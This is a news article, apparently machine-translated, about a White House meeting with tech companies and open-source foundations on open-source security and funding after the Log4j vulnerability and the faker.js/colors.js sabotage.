A meeting should discuss how to secure open source, with, between the lines, the question of financing crucial projects for tech.
In recent years, we have seen an accumulation of incidents involving open source: OpenSSL, Log4j and, to a lesser extent, the “faker.js” and “colors.js” software libraries. These problems would probably not be so serious if they were projects used by a handful of Internet users. But some programs, like OpenSSL and Log4j, are crucial to millions of others.
The problems of open source are not related to the availability of source code. They come more from the insufficient means available to the community of developers to properly maintain the projects. Volunteers are lacking and those who participate also do so voluntarily. Why ? Because there is not enough funding to pay teams to work regularly on this or that project.
A news item illustrated this situation somewhat dramatically: in January, it was reported that a volunteer developer chose to sabotage two open source projects to which he regularly contributed to expose the precariousness of open source – and in fact , the insufficient security that can sometimes surround certain projects. Thousands of other software that depended on these two software libraries, “faker.js” and “colors.js”, were thus hindered.
Summit meeting for open source
This issue of open source funding could well be on the menu of upcoming discussions at the White House between several representatives of Silicon Valley and members of the American administration, as well as several federal services and American ministries. . This encounter was reported on January 13 by Cyberscoop and picked up by The Verge. It must take place on January 13.
Among the companies represented at the meeting are Apple, Google, Amazon, Meta (ex-Facebook), IBM and Microsoft, which are all American companies with very significant financial capacities and whose activities are based, in part, also on open source, at one level or another. Some of these groups already contribute in part to certain projects, by also putting open source tools themselves.
The world of open source must also be present, reports the English-speaking press, with in particular the Apache Software Foundation, which precisely oversees the Log4j project, which hit the headlines at the end of 2021. GitHub and the Linux Open Source Foundation are also announced . In addition, the American company Oracle, which is the firm behind the Java programming language, which Log4J uses, will also be there.
On the administration side, we are talking about the ministries of Commerce, Defense, Energy, Homeland Security, but also agencies such as the CISA (Cybersecurity and Infrastructure Security Agency), which oversaw the security American elections, and the NIST (National Institute of Standards and Technology), which works in particular on encryption issues.
Log4j will be a long-term problem for tech
It can be difficult to realize the importance of certain open source projects on the web. Log4j is a library used as part of the Java language, which is “called” by other programs, in order to perform certain actions without having to write them, which saves time. In short, we rely on the work of other developers.
This Log4j library has the role of recording the activity of an application, via “logs”. This makes it possible to follow the behavior of a program and, if a concern is triggered, to note the problem in an error report. This can then be used to make certain corrections. The problem is that Log4j has a weakness: it is possible to hijack it to force it to execute unauthorized code (in short: malicious code) on a server using Log4j.
Since then, there has been a race for patches in the face of successive vulnerabilities that have been discovered. For the moment, it is generally considered that the problem with Log4j is likely to last for years and is really serious, even if the risk is not really noticeable on the side of the general public. One thing is certain: flaws in this library are starting to give rise to all kinds of horrors, such as botnets, cryptocurrency miners or ransomware.
When, moreover, we know to what extent the field of cyber has become a field of confrontation between great powers, where espionage and hacking operations can be organized over several years, we can understand the fears of the White House and the reasons why she is organizing such a meeting with the tech, to see how she can be used more to avoid a Log4j-bis. By paying more, perhaps.
